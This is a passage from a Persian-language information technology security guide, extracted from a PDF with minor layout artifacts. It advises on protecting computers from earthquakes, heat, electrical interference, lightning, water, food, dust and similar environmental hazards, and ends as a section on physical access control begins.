‫ﻭ ﺑﺎﻻﻱ ﺳﻘﻒ ﻛﺎﺫﺏ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺑﻪ ﻛﺴﻲ ﺍﺟﺎﺯﻩ ﺍﺳﺘﻌﻤﺎﻝ ﺩﺧﺎﻧﻴﺎﺕ ﻧﺪﻫﻴﺪ‪.‬‬
‫ﺯﻣﻴﻦﻟﺮﺯﻩ‬
‫ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﺯﻣﻴﻦ‪ ،‬ﻟﺮﺯﺷﻬﺎﻱ ﻣﻮﺳﻤﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﺩﺭ ﺯﻣﻴﻦﻟﺮﺯﻩ ﻓﺮﻭ ﻣـﻲﺭﻳﺰﻧـﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺳﺮﭘﺎ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺩﻗﻴﻖ ﺑﻪ ﻧﺤﻮﺓ ﺍﺳﺘﻘﺮﺍﺭ ﻃﺎﻗﭽﻪﻫﺎ ﻭ ﻗﻔﺴﻪﻫﺎﻱ ﻛﺘﺎﺏ ﺩﺭ ﺩﻓﺘﺮﺗﺎﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺷـﻤﺎ ﺍﺯ‬
‫ﺷﺪﻳﺪﺗﺮﻳﻦ ﺳﻮﺍﻧﺢ ﺟﺎﻥ ﺳﺎﻟﻢ ﺑﺪﺭ ﺑﺮﻳﺪ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ‪.‬‬
‫ﺍﺯ ﮔﺬﺍﺷﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺭﺗﻔﺎﻋﺎﺕ ﺯﻳﺎﺩ ﻳﺎ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩ ﻭ ﻫﻤﻴﻨﻄﻮﺭ ﺍﺯ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺍﺷﻴﺎﻱ ﺳﻨﮕﻴﻦ ﺭﻭﻱ ﻗﻔﺴﻪﻫﺎﻱ ﻧﺰﺩﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺑﭙﺮﻫﻴﺰﻳـﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺯﻳﺮ ﻣﻴﺰﻫﺎﻱ ﻗﻮﻱ ﻗﺮﺍﺭﺩﺍﺩ ﻳﺎ ﺑﻪ ﺳﻄﺤﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻣﺘﺼﻞ ﻛﺮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﭘـﻴﭻ ﻭ ﻣﻬـﺮﻩ‪،‬‬
‫ﻧﻮﺍﺭﻫﺎﻱ ﻧﮕﻬﺪﺍﺭﻧﺪﻩ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪) .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪(.‬‬
‫ﻛﻤﺘﺮﻳﻦ ﻭ ﺑﻴﺸﺘﺮﻳﻦ ﺩﻣﺎ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺎﻧﻨﺪ ﺍﻓﺮﺍﺩ ﺩﺭ ﺩﺍﻣﻨﺔ ﺧﺎﺻﻲ ﺍﺯ ﺩﻣﺎ ﺧﻮﺏ ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺍﻏﻠـﺐ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺎﻳـﺪ ﺩﺭ ﺩﻣـﺎﻳﻲ ﺑـﻴﻦ ‪ ۱۰‬ﺗـﺎ ‪ ۳۲‬ﺩﺭﺟـﺔ‬
‫ﺳﻠﺴﻴﻮﺱ )‪ ۵۰‬ﺗﺎ ‪ ۹۰‬ﺩﺭﺟﻪ ﻓﺎﺭﻧﻬﺎﻳﺖ( ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺩﻣﺎﻱ ﻣﺤﻴﻂ ﺍﻃﺮﺍﻑ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺧﻴﻠﻲ ﺑﺎﻻ ﺭﻭﺩ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ‬
‫ﺧﻮﺩ ﺭﺍ ﺧﻨﻚ ﻛﻨﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺟﺰﺍﻱ ﺩﺍﺧﻞ ﺁﻥ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺩﻣﺎ ﺧﻴﻠﻲ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻮﻙ ﺣﺮﺍﺭﺗـﻲ ﻭﺍﺭﺩ‬
‫ﺷﻮﺩ ﻭ ﻭﻗﺘﻲ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺭﻭﺷﻦ ﻣﻲﺷﻮﺩ ﺑﺮﺩﻫﺎﻱ ﻣﺪﺍﺭ ﻳﺎ ﻣﺪﺍﺭﻫﺎﻱ ﻣﺠﺘﻤﻊ ﺁﻥ ﺷﻜﺎﻑ ﺑﺮﺩﺍﺭﻧﺪ‪.‬‬
‫ﻭﻗﺘﻲ ﻣﺸﺨﺺ ﻛﺮﺩﻳﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﭼﻪ ﻣﺤﺪﻭﺩﺓ ﺩﻣﺎﻳﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻧﻮﺳﺎﻥ ﺑﺎﺷﻨﺪ‪ ،‬ﺁﻥ ﺩﻣﺎﻫﺎ ﺭﺍ ﺑﺮﺁﻭﺭﻳﺪ‪ .‬ﺑـﻪ ﺣـﺮﺍﺭﺕﮔﻴﺮﻫـﺎ ﻭ ﺍﻟﮕـﻮﻱ‬
‫ﺟﺮﻳﺎﻥ ﻫﻮﺍﻱ ﺩﺳﺘﮕﺎﻩﻫﺎﻳﺘﺎﻥ ﺗﻮﺟﻪ ﻭﻳﮋﻩ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺁﮊﻳﺮﻫﺎﻱ ﺩﻣﺎ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺩﻣﺎﻱ ﻣﺤﻴﻂ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﭘﺎﺭﺍﺯﻳﺖﻫﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ‬
‫ﻣﻮﺗﻮﺭﻫﺎ‪ ،‬ﭘﻨﻜﻪﻫﺎ‪ ،‬ﺗﺠﻬﻴﺰﺍﺕ ﺳﻨﮕﻴﻦ‪ ،‬ﻭ ﺣﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ‪ ،‬ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ ﺑـﺮﻭﺯ ﻣـﺴﺎﻳﻞ‬
‫ﻣﺘﻨﺎﻭﺏ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﭘﺎﺭﺍﺯﻳﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻓﻀﺎ ﻳﺎ ﻛﺎﺑﻠﻬﺎﻱ ﺍﻧﺘﻘﺎﻝ ﺑـﺮﻕ ﻧﺰﺩﻳـﻚ ﻣﺤﻠﺘـﺎﻥ‬
‫ﻣﻨﺘﻘﻞ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﻣﻮﺍﺝ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻧﻮﻉ ﺧﺎﺻﻲ ﺍﺯ ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﺎﻣﻞ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﭘﺎﻟﺲ ﻭﻟﺘﺎﮊ ﺑﺎﻻ ﻣﻲﺷﻮﻧﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ ﻫﺮ‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﻳﻚ ﻣﺪﺍﺭ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻣﺠﺰﺍ ﻭ ﻳﻚ ﺳﻴﻢ ﺯﻣﻴﻦ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺻﺎﻓﻲ ﻗﺪﺭﺕ ﺍﻳﺰﻭﻟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺗﺤﺖ ﻫﻴﭻ ﺷﺮﺍﻳﻄﻲ‬
‫ﻲ ﺳﻨﮕﻴﻦ ﻣﺪﺍﺭ ﺍﺷﺘﺮﻛﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺭﺳﺎﻧﺎﻫﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ )ﺍﺯ ﺟﻤﻠﻪ ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ( ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﻭﺭ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﻮﻧﺪ‪.‬‬
‫ﻧﺒﺎﻳﺪ ﺑﺎ ﻭﺳﺎﻳﻞ ﺑﺮﻗ ﹺ‬
‫ﺻﺎﻋﻘﻪ‬
‫ﺻﺎﻋﻘﻪ ﺍﻣﻮﺍﺝ ﺑﺰﺭﮒ ﺑﺮﻕ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﻭﺳﺎﻳﻞ ﺣﻔﺎﻇﺖ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺩﺍﺭﻧﺪ ﺭﺍ ﺧﺮﺍﺏ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺻـﺎﻋﻘﻪ ﺑـﻪ‬
‫ﺍﺳﻜﻠﺖ ﻓﻠﺰﻱ ﺳﺎﺧﺘﻤﺎﻥ ﺷﻤﺎ ﺍﺻﺎﺑﺖ ﻛﻨﺪ )ﻳﺎ ﺑﻪ ﺑﺮﻕﮔﻴﺮ ﺁﻥ ﺑﺮﺧﻮﺭﺩ ﻧﻤﺎﻳﺪ(‪ ،‬ﺟﺮﻳﺎﻥ ﺣﺎﺻﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻣﻴﺪﺍﻥ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﻗـﻮﻱ ﺩﺭ ﻣـﺴﻴﺮ‬
‫‪Smoke Detector‬‬
‫‪55‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٢٨٣‬‬
‫ﺧﻮﺩ ﺗﺎ ﺯﻣﻴﻦ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪ .‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺧﻼﻝ ﻃﻮﻓﺎﻧﻬﺎﻱ ﺻﺎﻋﻘﻪﺍﻱ ﺍﺯ ﭘﺮﻳﺰ ﺑﺮﻕ ﺑﻴﺮﻭﻥ ﻛـﺸﻴﺪﻩ ﺷـﻮﻧﺪ؛ ﺍﮔـﺮ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﻧﻴﺴﺖ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺑﺎﺯﺩﺍﺭﻧﺪﺓ ﺍﻣﻮﺍﺝ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﮔﺮﭼﻪ ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺮﺧﻮﺭﺩ ﻣﺴﺘﻘﻴﻢ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﺣﻔﺎﻇﺖ ﻧﺨﻮﺍﻫﻨـﺪ ﻛـﺮﺩ‪ ،‬ﻭﻟـﻲ‬
‫ﻭﻗﺘﻲ ﻃﻮﻓﺎﻧﻬﺎ ﺩﻭﺭ ﺑﺎﺷﻨﺪ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻭﺍﺳﻄﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺳﺎﺯﺓ ﻓﻠـﺰﻱ ﺳـﺎﺧﺘﻤﺎﻥ ﺩﻭﺭ ﻧﮕـﺎﻩ ﺩﺍﺷـﺘﻪ ﺷـﻮﻧﺪ‪.‬‬
‫ﻫﻴﭽﮕﺎﻩ ﺑﻴﺮﻭﻥ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺯ ﻛﺎﺑﻞ ﻣﺴﻲ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻓﻠﺰﻱ‪.‬‬
‫ﺁﺏ‬
‫ﺁﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻧﺎﺑﻮﺩ ﻛﻨﺪ‪ .‬ﺍﻭﻟﻴﻦ ﺧﻄﺮ ﺍﺗﺼﺎﻝ ﻛﻮﺗﺎﻩ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭﺻﻮﺭﺗﻲ ﭘﻴﺶ ﺧﻮﺍﻫـﺪ ﺁﻣـﺪ ﻛـﻪ ﺁﺏ ﻣﻴـﺎﻥ ﺧﻄـﻮﻁ‬
‫ﺣﺎﻭﻱ ﻭﻟﺘﺎﮊ ﻭ ﻳﻚ ﺧﻂ ﺍﻧﺘﻘﺎﻝ ﺯﻣﻴﻦ ﺻﻔﺤﺔ ﻣﺪﺍﺭ‪ ،‬ﺍﺗﺼﺎﻝ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪.‬‬
‫ﻻ ﺍﺯ ﺑﺎﺭﺍﻥ ﻳﺎ ﺳﻴﻞ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺑﭙﺎﺵ ﻗﻄﺮﻩﺍﻱ ﻛﻪ ﺍﺯ ﮐﻨﺘﺮﻝ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻧﺪ ﺟﺎﺭﻱ ﻣﻲﮔـﺮﺩﺩ‪ .‬ﺁﺏ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺁﺏ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺟﺎﻫﺎﻱ ﻋﺠﻴﺐ ﻭ ﻏﺮﻳﺐ ﻣﺎﻧﻨﺪ ﺳﺮﺭﻳﺰ ﺩﺳﺘﺸﻮﺋﻲﻫﺎ ﺩﺭ ﻃﺒﻘﺎﺕ ﺑﺎﻻﺗﺮ‪ ،‬ﻳﺎ ﺑﺮ ﺍﺛﺮ ﺧﺮﺍﺑﻜﺎﺭﻱﻫﺎ‪ ،‬ﻭ ﻳﺎ ﺍﺯ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺁﺗﺶﻧـﺸﺎﻧﻲ‬
‫ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺍﺯ ﻃﺒﻘﺎﺕ ﺯﻳﺮﺯﻣﻴﻦ ﻛﻪ ﺩﺭ ﻣﻌﺮﺽ ﺳﻴﻼﺏ ﻫﺴﺘﻨﺪ ﺑﻴﺮﻭﻥ ﺁﻭﺭﻳﺪ‪ .‬ﺣﺴﮕﺮﻫﺎﻱ ﺁﺏ ﺭﺍ ﺭﻭﻱ ﺯﻣﻴﻦ ﻃﺒﻘﻪﺍﻱ ﻛﻪ ﺳﺎﻟﻨﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﺩﺭ ﺁﻥ ﻫﺴﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﺯﻳﺮ ﻃﺒﻘﺎﺕ ﭘﻠﻪﺍﻱ ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻗﻄﻊ ﺍﺗﻮﻣﺎﺗﻴﻚ ﺑﺮﻕ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺳﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﻏﺬﺍ ﻭ ﻧﻮﺷﻴﺪﻧﻲﻫﺎ‬
‫ﻏﺬﺍﻫﺎ ﺑﻮﻳﮋﻩ ﻏﺬﺍﻫﺎﻱ ﭼﺮﺏ ﺑﻪ ﺍﻧﮕﺸﺘﺎﻥ ﺍﻓﺮﺍﺩ ﻣﻲﭼﺴﺒﻨﺪ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﺑﻪ ﻫﺮﭼﻪ ﻛﻪ ﻓﺮﺩ ﺑﻪ ﺁﻥ ﺩﺳﺖ ﻣﻲﺯﻧﺪ ﻣﻨﺘﻘﻞ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺍﻳـﻦ ﺍﺗﻔـﺎﻕ‬
‫ﻏﺎﻟﺒﹰﺎ ﺳﻄﻮﺡ ﺣﺴﺎﺱ ﻧﺴﺒﺖ ﺑﻪ ﻛﺜﻴﻔﻲ ﻣﺎﻧﻨﺪ ﻧﻮﺍﺭﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ‪ .‬ﻳﻜﻲ ﺍﺯ ﺳﺮﻳﻌﺘﺮﻳﻦ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﻳﻚ ﺻﻔﺤﻪ ﻛﻠﻴﺪ ﺭﻭﻣﻴﺰﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﻧﻮﺷﻴﺪﻧﻲ ﻏﻴﺮ ﺍﻟﻜﻠﻲ ﻳﺎ ﻳﻚ ﻓﻨﺠﺎﻥ ﻗﻬﻮﻩ ﺭﻭﻱ ﺩﻛﻤﻪﻫﺎﻱ ﺁﻥ ﺭﻳﺨﺘﻪ ﺷـﻮﺩ‪.‬‬
‫‪٥٦‬‬
‫ﺩﺭ ﺣﺎﻟﺖ ﻛﻠﻲ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻗﺎﻋﺪﻩ ﺍﻳﻤﻦﺗﺮﻳﻦ ﻫﻢ ﻫﺴﺖ‪ :‬ﻫﻤﺔ ﻏﺬﺍﻫﺎ ﻭ ﻧﻮﺷﺎﺑﻪﻫﺎ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺩﻭﺭ ﻧﮕﻬﺪﺍﺭﻳﺪ‪.‬‬
‫ﺳﺎﻳﺮ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ‬
‫ﻛﻨﺘﺮﻝ ﻣﺤﻴﻄﻲ‬
‫ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻣﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳﺘﻪ‪ ،‬ﺑﻪ ﻃﻮﺭ ﻣﺪﺍﻭﻡ ﺩﻣﺎ ﻭ ﺭﻃﻮﺑﺖ ﻧﺴﺒﻲ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻈﺎﺭﺕ ﻭ ﺛﺒﺖ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻗﺎﻋﺪﻩ ﻛﻠﻲ‪ ،‬ﻫـﺮ‬
‫‪ ۱۰۰۰‬ﻓﻮﺕ ﻣﺮﺑﻊ ﺍﺯ ﻓﻀﺎﻱ ﺍﺩﺍﺭﻱ ﺑﺎﻳﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺵ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺁﻧﭽﻪ ﺛﺒﺖ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺩﺭ ﺑـﺎﺯﻩﻫـﺎﻱ ﺯﻣـﺎﻧﻲ‬
‫ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﻭ ﮔﺰﺍﺭﺵ ﻛﻨﻴﺪ‪.‬‬
‫‪٥٦‬‬
‫ﺍﻳﻦ ﻗﺎﻋﺪﻩ ﺷﺎﻳﺪ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﻗﺎﻋﺪﻩﺍﻱ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﻏﺎﻟﺒﹰﺎ ﻫﻢ ﻧﻘﺾ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﻨﺪ‪:‬‬
‫• ﮔﺮﺩ ﻭ ﻏﺒﺎﺭ ‪ -‬ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻟﻨﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﮔﺮﺩ ﻭ ﻏﺒﺎﺭ ﺗﻤﻴﺰ ﻧﮕﻪ ﺩﺍﺭﻳﺪ‪ ،‬ﻭ ﺍﺯ ﻳﻚ ﺟﺎﺭﻭ ﺑﺮﻗـﻲ ﻣﺨـﺼﻮﺹ‬
‫ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺎ ﺻﺎﻓﻲ ﺑﺴﻴﺎﺭ ﺭﻳﺰ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻣﻨﻈﻢ ﺯﻣﺎﻧﻲ ﺑﺮﺍﻱ ﺗﻤﻴﺰﻛﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫• ﺍﻧﻔﺠﺎﺭ ‪ -‬ﺍﮔﺮ ﻣﺠﺒﻮﺭ ﻫﺴﺘﻴﺪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻣﺤﻴﻄﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﺧﻄﺮ ﺍﻧﻔﺠﺎﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎﻳﺪ ﻣﺤﻔﻈﻪﻫﺎﻱ ﺿﺪ ﺍﻧﻔﺠـﺎﺭ ﺭﺍ‬
‫ﺑﮑﺎﺭ ﺑﺮﻳﺪ‪ .‬ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻔﻈﻪﻫﺎﻱ ﺿﺪ ﺍﻧﻔﺠﺎﺭ ﻭ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻮﻃﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ‪.‬‬
‫• ﺣﺸﺮﺍﺕ ‪ -‬ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﻌﺪﺍﺩ ﺣﺸﺮﺍﺕ ﺩﺭ ﺳﺎﻟﻦ ﺭﺍﻳﺎﻧﻪﺗﺎﻥ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺆﺛﺮ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪.‬‬
‫• ﻟﺮﺯﺵ ‪ -‬ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺑﺎ ﻟﺮﺯﺵ ﺯﻳﺎﺩ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺯﻳﺮﺍﻧﺪﺍﺯ ﻻﺳﺘﻴﻜﻲ ﻳﺎ ﻧﺮﻡ ﻗﺮﺍﺭﺩﻫﻴﺪ‪ ،‬ﻃﻮﺭﻱ ﻛﻪ ﺩﺭﻳﭽـﻪﻫـﺎﻱ ﺗﻬﻮﻳـﺔ‬
‫ﻫﻮﺍ ﻣﺴﺪﻭﺩ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫• ﺭﻃﻮﺑﺖ ‪ -‬ﺭﻃﻮﺑﺖ ﻣﺤﻴﻂ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﻮﺩﻩ ﻭ ﺩﺭ ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﻧﮕﺎﻩ ﺩﺍﺭﻳﺪ‪.‬‬
‫‪٢٨٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ‬
‫ﻗﻮﺓ ﺗﺸﺨﻴﺺ ﺑﻪ ﺷﻤﺎ ﺣﻜﻢ ﻣﻲﻛﻨﺪ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻧﮕﻬﺪﺍﺭﻳﺪ؛ ﺍﻣﺎ ﺍﻳﻦ ﺍﺗﺎﻕ ﭼﻪ ﻗﺪﺭ ﺍﻳﻤﻦ ﺍﺳﺖ؟ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺗﺎﻗﻲ‬
‫ﻼ ﻧﺎﺍﻣﻦ ﺍﺳﺖ‪.‬‬
